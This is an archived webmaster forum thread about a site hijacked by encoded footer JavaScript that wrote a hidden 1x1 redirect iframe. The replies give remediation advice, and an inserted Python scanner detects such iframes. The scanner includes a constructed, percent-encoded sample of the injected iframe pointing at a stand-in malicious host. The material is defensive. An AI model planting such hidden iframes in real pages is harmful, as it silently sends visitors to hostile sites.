Webmaster General Forum

    
My Site was Hijacked
Hijackers added a snippet of encoded java code and took over
spaceylacie




msg:4077284
 11:01 pm on Feb 9, 2010 (gmt 0)

Despite what I was told by my host, a very popular, reputable company, I don't see how it could have been a password issue. The password is kept 100% secure and changed often.

The site is (well, was - it's dead now) interactive, so members can upload their own content. People can leave comments, etc.

Anyway, what happened is a .com site broke into my server and added an encrypted JavaScript code to the footer of every page.

But decoded it looks like this:
document.write('<ifra><iframe>'); -- Well, WebmasterWorld won't let me enter the code, but it's a one pixel by one pixel iframe that tries to redirect people to an external site.

You can't search your files for it because it's encrypted! The above gibberish is taken from the encrypted code opened in notepad, so hopefully it can be found by doing an exact search. Any help with this would be appreciated. I'm more of a publisher than a techie but did manage to find out this much.

[edited by: phranque at 1:10 pm (utc) on Feb 11, 2010]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]
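
On the point that the injected footer code cannot be found with a plain text search: the following is an added example, not code from the original thread, that decodes script bodies before looking for a tiny or hidden iframe. The injected code itself is not on the page, so the encodings handled (%XX, \xXX, String.fromCharCode) are assumptions, and the sample footer and its host name are constructed.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)", re.I)
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# An iframe counts as hidden if it is 0 or 1 pixel wide/high or styled invisible.
TINY_RE = re.compile(r"""(?:width|height)\s*[=:]\s*["']?[01](?:px)?\b"""
                     r"""|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)

def decode_layers(text, max_rounds=5):
    """Undo %XX, \\xXX and String.fromCharCode(...) encoding until the text is stable."""
    for _ in range(max_rounds):
        out = CHARCODE_RE.sub(lambda m: "".join(
            chr(int(n)) for n in re.findall(r"\d{1,6}", m.group(1))), text)
        out = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), out)
        out = unquote(out)
        if out == text:
            break
        text = out
    return text

def find_hidden_iframes(html):
    """Return the src of each tiny/hidden iframe written by a <script> block."""
    hits = []
    for body in SCRIPT_RE.findall(html):
        for tag in IFRAME_RE.findall(decode_layers(body)):
            if TINY_RE.search(tag):
                src = SRC_RE.search(tag)
                hits.append(src.group(1) if src else "")
    return hits

# Constructed sample: one fully %-encoded 1x1 iframe and one legitimate visible iframe.
_payload = '<iframe src="http://malicious.example.invalid/in.php" width="1" height="1"></iframe>'
SAMPLE_FOOTER = (
    "<div id='footer'>footer text</div>\n"
    "<script>document.write(unescape('" + "".join("%%%02X" % ord(c) for c in _payload) + "'));</script>\n"
    "<script>document.write('<iframe src=\"/widgets/poll.html\" width=\"300\" height=\"200\"></iframe>');</script>\n"
)

if __name__ == "__main__":  # usage: python scan.py /path/to/webroot
    for path in Path(sys.argv[1] if len(sys.argv) > 1 else ".").rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".php", ".tpl"}:
            for src in find_hidden_iframes(path.read_text(errors="replace")):
                print(f"{path}: hidden iframe -> {src}")
```

A clean result only means none of these three encodings was used; comparing the files against a known-good backup remains the more reliable check.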

 

Demaestro




msg:4077292
 11:09 pm on Feb 9, 2010 (gmt 0)

There have been a lot of these reported lately, and 90% of the time it was because a computer you store passwords or use passwords from was compromised.

You should also look at the server's access file that does 404 and 500 error redirects to a custom error page... you may find that they are now redirecting to the offending site as well.

Unplug all your personal/work computers from the network to avoid them doing more damage and scan them. Then from a confirmed uninfected computer change your server passwords.

Check this recent thread on the same issue for good info on how to proceed.

[webmasterworld.com...]

Leosghost




msg:4077296
 11:18 pm on Feb 9, 2010 (gmt 0)

Well, WebmasterWorld won't let me enter the code

Ask yourself why ..

spaceylacie




msg:4077325
 12:34 am on Feb 10, 2010 (gmt 0)

Thanks. Yeah, good reason I couldn't enter the code here.

I'm reading through the other topics about this now.

rocknbil




msg:4077368
 1:57 am on Feb 10, 2010 (gmt 0)

Also look through the posts on XSS and MySQL injection, another point of entry.

tangor




msg:4077390
 2:42 am on Feb 10, 2010 (gmt 0)

Sadly, these days, it appears that more website infections/hijacks are from programmer computers. NEVER use the same computer you develop/update a website with to do personal or company web surfing.

That simple.

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved